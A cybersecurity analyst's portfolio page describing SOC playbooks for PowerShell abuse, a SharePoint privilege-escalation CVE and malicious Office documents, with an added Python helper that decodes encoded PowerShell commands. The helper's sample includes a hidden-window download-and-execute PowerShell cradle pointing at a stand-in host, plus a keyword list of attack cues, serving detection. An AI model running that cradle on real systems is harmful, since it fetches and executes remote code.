🛡️ Veteran → Cyber Threat Hunter

From tactical supply chains to tactical cyber defense.

I’m Brandon Love — U.S. Army logistics veteran turned cybersecurity analyst. I secure systems, decode threats, and turn noisy signals into clear, actionable defense.

  • DFIR & Incident Response
  • MITRE ATT&CK
  • Let’sDefend / HTB
  • PowerShell & Network Forensics
Journey: Logistics ➝ Cyber Defense

Portfolio Highlights

Selected work with short case studies.

SOC Playbooks

How I triage, investigate, and respond to real-world alerts.

Suspicious PowerShell Execution

Event IDs 4104, 4688, Sysmon 1/7/11

Detect and investigate encoded or living-off-the-land PowerShell activity, with a focus on command-line logging and child process behavior.

  • Hunt for suspicious powershell.exe command lines
  • Correlate process tree with network connections
  • Export script blocks and decode payloads
  • Verify persistence and credentials impact
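The "export script blocks and decode payloads" step above, as an added example that is not part of this portfolio or its playbooks: a small Python triage helper that pulls an -EncodedCommand argument out of an Event 4688 / Sysmon 1 command line, decodes it the way PowerShell expects (base64 of UTF-16LE text) and collects the cues that justify escalation. The sample command lines and the example.invalid host are constructed for the demonstration.

```python
import base64
import re

# Flag spellings powershell.exe accepts for -EncodedCommand: -e, -ec, or any
# prefix of "encodedcommand" that begins with "en" (-enc, -enco, ...).
def is_encoded_flag(flag: str) -> bool:
    f = flag.lower()
    return f in ("e", "ec") or (f.startswith("en") and "encodedcommand".startswith(f))

# Cues worth escalating on, checked in the raw line and in the decoded script.
SUSPICIOUS_CUES = ("-w hidden", "-windowstyle hidden", "bypass", "iex", "invoke-expression",
                   "downloadstring", "net.webclient", "frombase64string", "invoke-webrequest")

def find_encoded_payload(cmdline: str):
    """Return the base64 argument that follows an -EncodedCommand-style flag, or None."""
    for flag, payload in re.findall(r"[-/](\w+)\s+([A-Za-z0-9+/=]+)", cmdline):
        if is_encoded_flag(flag):
            return payload
    return None

def decode_payload(payload: str):
    """PowerShell expects base64 of UTF-16LE text; return the script, or None if malformed."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except ValueError:  # covers both binascii.Error and UnicodeDecodeError
        return None

def triage_powershell(cmdline: str) -> dict:
    """Decode any encoded command and collect the cues that justify escalation."""
    payload = find_encoded_payload(cmdline)
    decoded = decode_payload(payload) if payload else None
    haystack = (cmdline + " " + (decoded or "")).lower()
    cues = [c for c in SUSPICIOUS_CUES if c in haystack]
    return {"encoded": payload is not None, "decoded": decoded, "cues": cues,
            "escalate": payload is not None or bool(cues)}

def make_encoded_command(script: str) -> str:
    """Build an -EncodedCommand argument as PowerShell does; used only to construct the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines as they would appear in Event 4688 / Sysmon 1 (not real telemetry).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
SAMPLE_LINES = [
    "powershell.exe -nop -w hidden -enc " + make_encoded_command(SAMPLE_SCRIPT),
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    "powershell.exe -ec QUJD",  # flag present, but the payload is not valid UTF-16LE
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(triage_powershell(line))
```

An encoded flag whose payload will not decode is still escalated, since a broken or truncated payload in a 4688 line is itself worth a look.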

SharePoint EoP (CVE-2023-29357)

Public-facing app exploit → privilege escalation

Playbook for investigating suspicious SharePoint activity, mapping evidence to MITRE ATT&CK and confirming impact.

  • Review SharePoint / IIS logs for exploit patterns
  • Correlate authentication changes & new privileges
  • Check for webshells or uploaded payloads
  • Validate containment and patch status

Malicious Office → Initial Access

Phishing → macro → child process

Playbook focused on suspicious Office documents spawning scripting engines or LOLBINs on endpoints.

  • Identify email + attachment source in mail logs
  • Correlate WINWORD.EXE / EXCEL.EXE child processes
  • Extract IOCs from dropped files and network traffic
  • Document user impact and recommend awareness actions

Hands-on SOC Experience

Live blue-team platforms and structured training.

Let’sDefend Blue Team Lab

Active SOC training · Realistic alert queues

I regularly work through SIEM alerts, phishing cases, and incident simulations on Let’sDefend to sharpen my triage and investigation flow.

  • Focus on alert triage, evidence gathering, and root-cause analysis
  • Practice mapping findings to MITRE ATT&CK
  • Document outcomes in SOC-style reports and playbooks

View my Let’sDefend profile

Cyber Range & Training Badges

Platforms I use to stay sharp.

  • Let’sDefend · Blue Team Labs: profile
  • Hack The Box · Windows & Linux boxes: hands-on attack paths & defense mindset
  • Splunk / SIEM Labs: search, correlation, dashboards
  • ISC2 & foundational security training: core security concepts & standards

I treat these platforms like a real SOC: hypothesis → evidence → conclusion → report.

Latest Blogs


Get in touch

Reach out about collaborations, open roles, or training opportunities.
